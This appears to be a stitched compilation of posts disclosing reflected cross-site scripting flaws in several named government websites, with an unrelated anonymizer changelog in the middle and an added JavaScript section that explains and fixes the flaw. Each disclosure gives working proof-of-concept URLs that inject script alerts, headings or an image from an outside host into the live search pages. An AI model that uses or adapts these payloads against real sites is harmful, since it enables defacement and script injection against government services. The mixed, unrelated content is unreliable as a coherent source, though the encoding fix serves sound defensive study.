Ministry of Defence of Belgium - XSS
Vulnerable page: http://www.mil.be/def/search/index.asp
PoC:
Code:
"><h1>XSS found by Team Elite</h1>
Code:
"><img src=http://te-home.net/images/logo.png>
You can enter any XSS code in the search box to reproduce the bug.
Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Ministry of Internal Affairs of Romania - XSS
Vulnerable page: http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=
PoC:
Code:
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cscript%3Ealert(String.fromCharCode(88%2C83%2C83))%3C%2Fscript%3E
Code:
http://www.mai.gov.ro/engleza/Home_eng/english.htm?searWords=%22%3E%3Cimg+src%3Dhttp%3A%2F%2Fte-home.net%2Fimages%2Flogo.png%3E&Send.x=8&Send.y=11
You can either enter any XSS code in the search input box, or request any XSS code directly using the GET method and the searWords parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
AdvOR 0.3.0.19a
Changes in 0.3.0.19a
- corrected: possible buffer overflow when setting a huge OS version string
- corrected: when changing the default OS version, a buffer that was not allocated with tor_malloc() was freed with tor_free() (thanks to anonymous for reporting this problem on sf.net)
- corrected: a generated AS path included some extra nodes that were before the selected path in the AS tree from geoip_as.h
- the program that imports AS path definitions and generates the geoip_as.h file is now included in the source code archive (as2asm)
- the AS path tree was updated with latest AS path definitions from cidr-report.org; a few errors were corrected in the AS tree import algorithm
- geoip_c.h was updated with GeoIPCountryWhois.csv released on December 5th; there are 84715 IP ranges having 114 ranges in the fake "A1" country; 110 ranges were approximated to real countries
- updated language strings: 1248
File information: AdvOR 0.3.0.19a
The Administration for Security and Counterintelligence of Republic of Macedonia - XSS
Vulnerable page: http://www.mvr.gov.mk/DesktopDefault.aspx
PoC:
Code:
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><script>alert(String.fromCharCode(88,83,83))</script>
Code:
http://www.mvr.gov.mk/DesktopDefault.aspx?tabindex=0&tabid=47&search="><img src=http://te-home.net/images/logo.png>
You can either enter any XSS code in the search input box, or request any XSS code directly using the GET method and the search parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
Government of Trinidad and Tobago - XSS
Vulnerable page: http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch
PoC:
Code:
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><h1>XSS found by Team Elite</h1>
Code:
http://www.ttconnect.gov.tt/gortt/portal/ttconnect/GovTTSimpleSearch?searchKeyword="><img src=http://te-home.net/images/logo.png>
You can either enter any XSS code in the search input box, or request any XSS code directly using the GET method and the searchKeyword parameter.
Note: This is a proof of concept and it doesn't reflect the views or interests of the above websites.
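The four XSS reports above share one pattern: the search term is echoed back into the page without encoding. The JavaScript below is an added example, not part of the original posts or of any site's code; it shows the unencoded rendering beside the encoded one, plus a regression check. It assumes the term lands inside a quoted value attribute (which the leading "> in the PoCs suggests), and all function names are hypothetical.

```javascript
// Added illustration; function names are hypothetical, not taken from any of the sites.

// Read one parameter from a raw query string the way a server framework would
// (percent-decoding, '+' treated as space).
function termFromQuery(queryString, name) {
  return new URLSearchParams(queryString).get(name) || '';
}

// Encode the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[ch]));
}

// "Before": the search term is concatenated into the attribute as-is,
// so a value starting with "> closes the attribute and the tag.
function renderSearchBoxUnsafe(term) {
  return '<input type="text" name="search" value="' + term + '">';
}

// "After": the term is encoded for the attribute context at output time.
function renderSearchBoxSafe(term) {
  return '<input type="text" name="search" value="' + escapeHtml(term) + '">';
}

// Regression check for a template test suite: the rendered field must consist
// of exactly one tag (the <input>). Any extra tag means the value escaped
// its attribute and introduced markup of its own.
function hasInjectedMarkup(html) {
  const tags = html.match(/<[a-zA-Z\/][^>]*>/g) || [];
  return tags.length !== 1;
}

// Sample input: one of the query strings quoted in the reports above.
const sampleQuery =
  'searWords=%22%3E%3Cimg+src%3Dhttp%3A%2F%2Fte-home.net%2Fimages%2Flogo.png%3E&Send.x=8&Send.y=11';
const sampleTerm = termFromQuery(sampleQuery, 'searWords');

console.log('unsafe:', renderSearchBoxUnsafe(sampleTerm), hasInjectedMarkup(renderSearchBoxUnsafe(sampleTerm)));
console.log('safe:  ', renderSearchBoxSafe(sampleTerm), hasInjectedMarkup(renderSearchBoxSafe(sampleTerm)));
```

Encoding at output time, for the context the value is written into, is what closes the hole; filtering individual tags on input does not, since the posts show both a heading and an image getting through.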